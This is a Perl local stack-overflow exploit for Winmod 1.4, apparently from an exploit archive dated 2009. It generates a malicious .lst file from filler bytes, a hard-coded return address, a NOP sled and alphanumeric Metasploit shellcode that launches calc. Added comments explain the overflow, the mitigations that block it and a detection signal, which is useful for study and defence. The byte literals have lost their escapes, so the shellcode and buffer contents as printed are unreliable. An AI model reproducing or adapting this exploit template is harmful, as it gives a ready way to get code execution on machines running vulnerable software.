
# Title : WINMOD 1.4 (.lst) Local Stack Overflow Exploit
# Published : 2009-07-23
# Author : CWH Underground


#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#

# Banner: title, credit line and the group's ASCII art, emitted to STDOUT
# one string at a time. Purely cosmetic; nothing here affects the file that
# the rest of the script generates.
my @banner_rows = (
    "n==================================================n",
    "    Winmod 1.4 (.lst) Local Stack Overflow Exploit n",
    " n",
    "         Discovered By CWH Underground n",
    "==================================================n",
    "                                              n",
    "  ,--^----------,--------,-----,-------^--,   n",
    "  | |||||||||   `--------'     |          O    n",
    "  `+---------------------------^----------|   n",
    "    `_,-------, _________________________|   n",
    "      / XXXXXX /`|     /                      n",
    "     / XXXXXX /  `   /                       n",
    "    / XXXXXX /______(                        n",
    "   / XXXXXX /                                 n",
    "  / XXXXXX /   .. CWH Underground Hacking Team ..  n",
    " (________(                                   n",
    "  `------'                                    n",
    "                                              n",
);
for my $row (@banner_rows) {
    print $row;
}

# Payload blob appended to the generated .lst file.
# According to the generator line below, this is a Metasploit win32_exec
# payload with CMD=calc, i.e. its only action is to start the Windows
# calculator as a visible proof that code execution was reached. It is
# 343 bytes, alphanumerically encoded (PexAlphaNum), with a SEH-based exit.
# NOTE(review): the page rendering has altered the string escapes in this
# listing, so the literal below is not the byte sequence the author
# intended; treat it as an opaque, non-authoritative copy.
# Detection angle: a playlist-style .lst file should be short lines of
# text. One long unbroken line followed by a dense alphanumeric run like
# this one is a strong anomaly signal for content inspection.
## win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41".
"x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59".
"x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c".
"x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45".
"x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66".
"x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f".
"x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59".
"x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a".
"x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44".
"x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77".
"x6cx6ex6bx46x61x5ax4bx4fx79x31x4cx47x54x37x74x6a".
"x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b".
"x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57".
"x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f".
"x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73".
"x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39".
"x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45".
"x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45".
"x33x73x51x72x4cx71x73x63x30x41";

# Assemble the .lst file contents by plain concatenation, in this order:
#   1. a filler token repeated 500 times,
#   2. one fixed four-byte value,
#   3. a padding token repeated 12 times,
#   4. the payload held in $shellcode,
#   5. a short trailer (one token, then the filler token repeated 9 times).
# NOTE(review): the page rendering has altered the string escapes, so the
# lengths implied by the literals below may not match the author's intent.
# Reading this against the title ("Local Stack Overflow"): the filler
# presumably overruns a fixed-size stack buffer in WINMOD's .lst parser, and
# the four-byte value presumably lands on the saved return address — TODO
# confirm against the vulnerable binary.
# That value is hard-coded, so the file depends on the exact module layout
# of the build named in the header (Win XP SP2 EN). Address randomisation
# (ASLR), a non-executable stack (DEP) and stack cookies (/GS) each break
# this style of overwrite. The root-cause fix is a length check in the
# parser before the copy.
my $buf="x41" x 500;
$buf = $buf."x68xD5x85x7C";
$buf = $buf.("x90" x 12);
$buf = $buf.$shellcode;
# Trailer: purpose is not visible from this script — presumably needed so
# the parser accepts the line (looks like a dot plus a short suffix).
$buf = $buf."x2E".("x41"x9);

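# Write the assembled buffer to cwh_xpl.lst in the current working directory
# (an existing file of that name is truncated), then report the result.
# Uses three-argument open with a lexical handle instead of a bareword
# global handle, and checks print/close so a short or failed write is not
# reported as success.
open(my $out_fh, '>', 'cwh_xpl.lst') or die ("[+] Error: cannot open destination filen");
print {$out_fh} $buf or die "[+] Error: write to cwh_xpl.lst failed: $!";
# Buffered write errors only surface at close, so check it as well.
close($out_fh) or die "[+] Error: close of cwh_xpl.lst failed: $!";

print "[+] Create exploit file successfuln";
print "[+] File's name is cwh_xpl.lstn";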

#####################################################################
#Greetz	     : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
